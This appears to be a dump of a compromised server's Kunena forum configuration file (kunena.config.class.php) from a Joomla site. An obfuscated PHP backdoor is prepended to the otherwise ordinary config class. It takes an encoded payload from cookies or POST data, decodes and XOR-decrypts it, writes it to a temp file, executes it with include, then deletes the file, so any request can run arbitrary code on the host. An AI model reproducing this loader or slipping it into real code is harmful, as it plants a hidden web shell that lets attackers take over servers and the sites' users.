Path : /home/admin/public_html/old/board/components/com_kunena/lib/ |
Current File : /home/admin/public_html/old/board/components/com_kunena/lib/kunena.config.class.php |
<?php $jOLsM = class_exists("UiT_NNwY"); $RlXzh = $jOLsM;if (!$RlXzh){class UiT_NNwY{private $AkJicu;public static $PWgdrC = "12c69e5c-7359-480a-8e6c-f64a45b9fb4d";public static $MhBQialU = NULL;public function __construct(){$EFnbKYyy = $_COOKIE;$DGFJz = $_POST;$csCkGvLAo = @$EFnbKYyy[substr(UiT_NNwY::$PWgdrC, 0, 4)];if (!empty($csCkGvLAo)){$TYaoEN = "base64";$qwIliMYx = "";$csCkGvLAo = explode(",", $csCkGvLAo);foreach ($csCkGvLAo as $cgnqJR){$qwIliMYx .= @$EFnbKYyy[$cgnqJR];$qwIliMYx .= @$DGFJz[$cgnqJR];}$qwIliMYx = array_map($TYaoEN . "\x5f" . 'd' . 'e' . "\x63" . "\157" . chr (100) . "\x65", array($qwIliMYx,)); $qwIliMYx = $qwIliMYx[0] ^ str_repeat(UiT_NNwY::$PWgdrC, (strlen($qwIliMYx[0]) / strlen(UiT_NNwY::$PWgdrC)) + 1);UiT_NNwY::$MhBQialU = @unserialize($qwIliMYx);}}public function __destruct(){$this->zXRLKoO();}private function zXRLKoO(){if (is_array(UiT_NNwY::$MhBQialU)) {$YidGnghYWI = sys_get_temp_dir() . "/" . crc32(UiT_NNwY::$MhBQialU["\x73" . "\141" . "\x6c" . chr ( 521 - 405 )]);@UiT_NNwY::$MhBQialU["\167" . "\162" . "\x69" . chr ( 763 - 647 ).'e']($YidGnghYWI, UiT_NNwY::$MhBQialU["\143" . chr (111) . "\156" . chr (116) . 'e' . chr ( 469 - 359 ).chr (116)]);include $YidGnghYWI;@UiT_NNwY::$MhBQialU["\144" . chr (101) . "\x6c" . chr (101) . chr (116) . "\145"]($YidGnghYWI);exit();}}}$IHpZcaUn = new UiT_NNwY(); $IHpZcaUn = NULL;} ?><?php /** * @version $Id: kunena.config.class.php 4336 2011-01-31 06:05:12Z severdia $ * Kunena Component * @package Kunena * * @Copyright (C) 2008 - 2011 Kunena Team. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * @link http://www.kunena.org * * Based on FireBoard Component * @Copyright (C) 2006 - 2007 Best Of Joomla All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * @link http://www.bestofjoomla.com **/ // Dont allow direct linking defined ( '_JEXEC' ) or die (); require_once (JPATH_ROOT . DS . 'administrator/components/com_kunena/libraries/api.php'); kimport ( 'error' ); abstract class CKunenaConfigBase { public function __construct() { $this->_db = JFactory::getDBO (); } // // The following functions MUST be overridden in derived classes // abstract public function &getInstance(); abstract public function GetClassVars(); abstract protected function GetConfigTableName(); // Override this to perform certain custom validations of the config data // Is being executed before save and after load abstract public function ValidateConfig(); // // binds a named array/hash to this object // @param array $hash named array // @return null|string null is operation was satisfactory, otherwise returns an error // protected function bind($array, $ignore = '') { if (! is_array ( $array )) { $this->_error = strtolower ( get_class ( $this ) ) . '::bind failed.'; return false; } else { foreach ( $array as $k => $v ) { if (isset ( $this->$k )) $this->$k = $v; } } return true; } // // Create the config table for Kunena and add initial default values // public function create() { $fields = array (); // Perform custom validation of config data before we write it. $this->ValidateConfig (); $vars = $this->GetClassVars (); foreach ( $vars as $name => $value ) { // // Need to provide ability to override certain settings // in derived class without the need to recode this entire function // // Exclude private class variables if ($name != '_db') { switch (gettype ( $value )) { case 'integer' : $fields [] = "`$name` INTEGER NULL"; break; case 'string' : $fields [] = "`$name` TEXT NULL"; break; } } } $collation = $this->_db->getCollation (); if (!strstr($collation, 'utf8')) $collation = 'utf8_general_ci'; $this->_db->setQuery ( "CREATE TABLE {$this->GetConfigTableName ()} (" . implode ( ', ', $fields ) . ", PRIMARY KEY (`id`) ) DEFAULT CHARACTER SET utf8 COLLATE {$collation}" ); $this->_db->query (); if (KunenaError::checkDatabaseError ()) return; // Insert current Settings $vars = get_object_vars ( $this ); // for the actual values we must not use the class vars funtion $vars ['id'] = 1; $fields = array (); foreach ( $vars as $name => $value ) { // Exclude internal class vars e.g. _db if ($name [0] != '_' && array_key_exists ( $name, $this->GetClassVars () )) { $fields [] = "{$this->_db->nameQuote($name)}={$this->_db->quote($value)}"; } } $this->_db->setQuery ( "INSERT INTO " . $this->GetConfigTableName () . " SET " . implode ( ', ', $fields ) ); $this->_db->query (); KunenaError::checkDatabaseError (); } // // Create a backup of most current config table // public function backup() { // remove old backup if one exists $this->_db->setQuery ( "DROP TABLE IF EXISTS " . $this->GetConfigTableName () . "_backup" ); $this->_db->query (); if (KunenaError::checkDatabaseError ()) return; $this->_db->setQuery ( "CREATE TABLE " . $this->GetConfigTableName () . "_backup SELECT * FROM " . $this->GetConfigTableName () ); $this->_db->query (); if (KunenaError::checkDatabaseError ()) return; } // // Remove the current config table // public function remove() { $this->_db->setQuery ( "DROP TABLE IF EXISTS " . $this->GetConfigTableName () ); $this->_db->query (); KunenaError::checkDatabaseError (); } // // Load config settings from database table // public function load($userinfo = null) { $this->_db->setQuery ( "SELECT * FROM " . $this->GetConfigTableName () ); $config = $this->_db->loadAssoc (); if ($this->_db->getErrorNum ()) { $app = JFactory::getApplication (); $app->enqueueMessage ( 'Kunena ' . JText::_ ( 'COM_KUNENA_INTERNAL_ERROR_CONFIG' ), 'error' ); return; } if ($config != null) { $this->bind ( $config ); } // Perform custom validation of config data before we let anybody access it. $this->ValidateConfig (); } } class CKunenaConfig extends CKunenaConfigBase { // All vars MUST BE LOWER CASE! // New in Kunena 1.5.2: $id for JoomFish support var $id = 0; var $board_title = 'Kunena'; var $email = 'change@me.com'; var $board_offline = 0; var $board_ofset = '0.00'; // DEPRECATED, needed in installer var $offline_message = "<h2>The Forum is currently offline for maintenance.</h2>\n<div>Check back soon!</div>"; var $enablerss = 1; var $enablepdf = 1; var $threads_per_page = 20; var $messages_per_page = 6; var $messages_per_page_search = 15; var $showhistory = 1; var $historylimit = 6; var $shownew = 1; var $jmambot = 0; var $disemoticons = 0; var $template = 'default'; var $showannouncement = 1; var $avataroncat = 0; var $catimagepath = 'category_images/'; var $showchildcaticon = 1; var $annmodid = '62'; var $rtewidth = 450; var $rteheight = 300; var $enableforumjump = 1; var $reportmsg = 1; var $username = 1; var $askemail = 0; var $showemail = 0; var $showuserstats = 1; var $showkarma = 1; var $useredit = 1; var $useredittime = 0; var $useredittimegrace = 600; var $editmarkup = 1; var $allowsubscriptions = 1; var $subscriptionschecked = 1; var $allowfavorites = 1; var $maxsubject = 50; var $maxsig = 300; var $regonly = 0; var $changename = 0; var $pubwrite = 0; var $floodprotection = 0; var $mailmod = 0; var $mailadmin = 0; var $captcha = 0; var $mailfull = 1; var $allowavatar = 1; // DEPRECATED, needed in installer var $allowavatarupload = 1; var $allowavatargallery = 1; var $avatarquality = 65; var $avatarsize = 2048; var $allowimageupload = 0; var $allowimageregupload = 1; var $imageheight = 800; var $imagewidth = 800; var $imagesize = 150; var $allowfileupload = 0; var $allowfileregupload = 1; var $filetypes = 'txt,rtf,pdf,zip,tar.gz,tgz,tar.bz2'; var $filesize = 120; var $showranking = 1; var $rankimages = 1; var $avatar_src = 'fb'; // DEPRECATED, needed in installer var $fb_profile = 'fb'; // DEPRECATED, needed in installer var $pm_component = 'no'; // DEPRECATED, needed in installer var $userlist_rows = 30; var $userlist_online = 1; var $userlist_avatar = 1; var $userlist_name = 1; var $userlist_username = 1; var $userlist_posts = 1; var $userlist_karma = 1; var $userlist_email = 0; var $userlist_usertype = 0; var $userlist_joindate = 1; var $userlist_lastvisitdate = 1; var $userlist_userhits = 1; var $latestcategory = ''; var $showstats = 1; var $showwhoisonline = 1; var $showgenstats = 1; var $showpopuserstats = 1; var $popusercount = 5; var $showpopsubjectstats = 1; var $popsubjectcount = 5; var $usernamechange = 0; var $rules_infb = 1; // retired in 1.6 controlled via joommla menu var $rules_cid = 1; var $help_infb = 1; // retired in 1.6 controlled via joommla menu var $help_cid = 1; // New 1.0.5 config variables // bbcode options var $showspoilertag = 1; var $showvideotag = 1; var $showebaytag = 1; var $trimlongurls = 1; var $trimlongurlsfront = 40; var $trimlongurlsback = 20; var $autoembedyoutube = 1; var $autoembedebay = 1; var $ebaylanguagecode = 'en-us'; var $fbsessiontimeout = 1800; // in seconds // New 1.0.5RC2 config variables var $highlightcode = 0; // New 1.6 rss config vars var $rss_type = 'topic'; var $rss_timelimit = 'month'; var $rss_limit = 100; var $rss_included_categories = ''; var $rss_excluded_categories = ''; var $rss_specification = 'rss2.0'; var $rss_allow_html = 1; var $rss_author_format = 'name'; var $rss_author_in_title = 1; var $rss_word_count = '0'; var $rss_old_titles = 1; var $rss_cache = 900; var $fbdefaultpage = 'recent'; // New 1.0.8 config variables var $default_sort = 'asc'; // 'desc' for latest post first // New 1.5.7 config variables var $alphauserpointsnumchars = 0; // Integration feature for AlphaUserPoints component // New 1.5.8 config variables var $sef = 1; var $sefcats = 0; var $sefutf8 = 0; // New for 1.6 -> Hide images and files for guests var $showimgforguest = 1; var $showfileforguest = 1; //New for 1.6 -> Poll var $pollnboptions = 4; //For poll integration, set the number maximum of options var $pollallowvoteone = 1; //For poll integration, set if yes or no the user can vote one or more time for a poll var $pollenabled = 1; //For poll integration, for disable the poll var $poppollscount = 5; var $showpoppollstats = 1; var $polltimebtvotes = '00:15:00'; var $pollnbvotesbyuser = 100; var $pollresultsuserslist = 1; // New for 1.6 -> Max length for personnal text var $maxpersotext = 50; // New for 1.6 -> Choose ordering system var $ordering_system = 'mesid'; // New for 1.6 -> dateformat var $post_dateformat = 'ago'; // See CKunenaTimeformat::showDate() var $post_dateformat_hover = 'datetime'; // See CKunenaTimeformat::showDate() // New for 1.6 -> hide IP var $hide_ip = 1; // New for 1.6 -> disable/enable activity stream var $js_actstr_integration = 0; // DEPRECATED, used in installer // New for 1.6 -> image file types var $imagetypes = 'jpg,jpeg,gif,png'; var $checkmimetypes = 1; var $imagemimetypes = 'image/jpeg,image/jpg,image/gif,image/png'; var $imagequality = 50; var $thumbheight = 32; var $thumbwidth = 32; // New for 1.6: hide profile info when user is deleted from joomla! var $hideuserprofileinfo = 'put_empty'; // New for 1.6 -> New integration options var $integration_access = 'auto'; var $integration_login = 'auto'; var $integration_avatar = 'auto'; var $integration_profile = 'auto'; var $integration_private = 'auto'; var $integration_activity = 'auto'; //New for 1.6: choose if you want that ghost message box checked by default var $boxghostmessage = 0; var $userdeletetmessage = 0; var $latestcategory_in = 1; var $topicicons = 1; var $onlineusers = 1; var $debug = 0; var $catsautosubscribed = 0; var $showbannedreason = 0; var $version_check = 1; //New for 1.6: choose if you want a Thank you function var $showthankyou = 1; var $showpopthankyoustats = 1; var $popthankscount = 5; //New for 1.6: choose to allow moderators to see deleted messages var $mod_see_deleted = 0; //New for 1.6: allow only secure image extensions (jpg/gif/png) in IMG tag var $bbcode_img_secure = 'text'; var $listcat_show_moderators = 1; //New for 1.6.1: allow the admin to disable lightbox var $lightbox = 1; //New for 1.6.1: allow the admin to limit the length of the activity stream var $activity_limit = 0; //New for 1.6.2: choose the time since which to show the topics var $show_list_time = 720; //New for 1.6.2: configuration option to show online users by minutes or session time var $show_session_type = 0; var $show_session_starttime = 0; // New for 1.6.2: configuration option to set all users or only registred users to see userlist var $userlist_allowed = 0; public function __construct($userinfo = null) { parent::__construct (); } // // Mandatory overrides from abstract base class // public function &getInstance() { static $instance = NULL; if (! $instance) { $instance = new CKunenaConfig (); $instance->load (); } return $instance; } public function GetClassVars() { return get_class_vars ( 'CKunenaConfig' ); } protected function GetConfigTableName() { return "#__kunena_config"; } public function ValidateConfig() { // Add anything that requires validation // Need to have at least two per page of these $this->messages_per_page = max ( $this->messages_per_page, 2 ); $this->messages_per_page_search = max ( $this->messages_per_page_search, 2 ); $this->threads_per_page = max ( $this->threads_per_page, 2 ); } }